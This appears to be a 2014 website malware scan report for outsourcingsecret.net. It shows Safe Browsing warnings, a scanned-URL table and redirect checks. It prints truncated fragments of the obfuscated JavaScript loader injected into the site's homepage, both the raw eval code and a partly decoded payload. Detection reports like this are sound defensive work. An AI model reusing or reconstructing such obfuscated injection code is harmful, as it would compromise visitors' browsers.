Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=outsourcingsecret.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://outsourcingsecret.net/ | 200 OK Content-Length: 31939 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(";zvnzuCQiPgqkeQh=vvCzAZkbRjPCyWITmDzJZhHkvLoEFMGsYPbgZZEvdU;)mOsBucAFshfrzPOoxHeIfw(etirw.tnemucod;veDdFBQDVvfBjtDFFOhxmjNCw=WiDrcuLYpWYIUFqecGrAreEvgqRqICcPrwdEBNeTIFtas };)XjPvDyJdEkVpEyoI(edoCrahCmorf.gnirtS=+mOsBucAFshfrzPOoxHeIfw;kSCRmTMQhpIcKlDySFoHchoMhVCfIes=zvnzuCQiPgqkeQh ;)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw=^XjPvDyJdEkVpEyoI )XjPvDyJdEkVpEyoI=!)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBj ...[1309 bytes skipped]... Decoded script: wfIeHxoOPzrfhsFAcuBsOm='';ZuiCM=wfIeHxoOPzrfhsFAcuBsOm;wCNjmxhOFFDtjBfvVDQBFdDev='UzDGWVZIPYdXouvLPOmLFtyjmzocTOUhdoQSqNhPYgUEyAO';WwSbNBgUrBzfo=ZuiCM;seIfCVhMohcHoFSyDlKcIphQMTmRCSk=0;eseGLoQRqEoLwOuAuYmXgLXLklnrMuR=WwSbNBgUrBzfo;twhunhbO='%46%2D%21%25%37%37%2C%70%2A%16%3B%52%57%1E%38%24%3F%57%63%69%17%0A%1C%08%08%1B%4D%3D%21%7A%01%0A%41%32%34%18%71%0C%35%3F%06%20%29%0D%63%6F%33%08%25%2A%32%34%35%3B%34%3C%16%65%4D%45%54%6C%23%2C%1F%23%2A%18%10% ...[3190 bytes skipped]... Antivirus reports:
| ||
http://halehalemusic.com/css/header.js | 500 Can't connect to halehalemusic.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://halehalemusic.com/test404page.js | 500 Can't connect to halehalemusic.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://robertwalz.com/header.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Dec 2014 06:41:28 GMT Pragma: no-cache Location: http://www.robertwalz.com/header.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=MW%2Cnj%2CTipU5dGKWbKwN7o3; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/header.js/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/pods/ui/js/pods.ui.js?ver=3.5.1 | 200 OK Content-Length: 590 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/themes/rw/js/jquery.cycle.min.js?ver=3.5.1 | 200 OK Content-Length: 20004 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.form.min.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/contact-form-7/scripts.js?ver=2.3 | 200 OK Content-Length: 4442 Content-Type: application/javascript | clean |
http://robertwalz.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Dec 2014 06:41:34 GMT Pragma: no-cache Location: http://www.robertwalz.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=3un75w-Tu07XN08ahvPja2; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=2 | 200 OK Content-Length: 4507 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=39 | 200 OK Content-Length: 12435 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN0464_2.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN6348.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/disassembly.jpg | 200 OK Content-Length: 301698 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: outsourcingsecret.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 06:41:27 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 31939
Content-Type: text/html
Last-Modified: Sun, 25 Mar 2012 00:54:29 GMT
...31939 bytes of data.
GET / HTTP/1.1
Host: outsourcingsecret.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 06:41:27 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 31939
Content-Type: text/html
Last-Modified: Sun, 25 Mar 2012 00:54:29 GMT
...31939 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: outsourcingsecret.net
Referer: http://www.google.com/search?q=outsourcingsecret.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: outsourcingsecret.net
Referer: http://www.google.com/search?q=outsourcingsecret.net
Result:
The result is similar to the first query. There are no suspicious redirects found.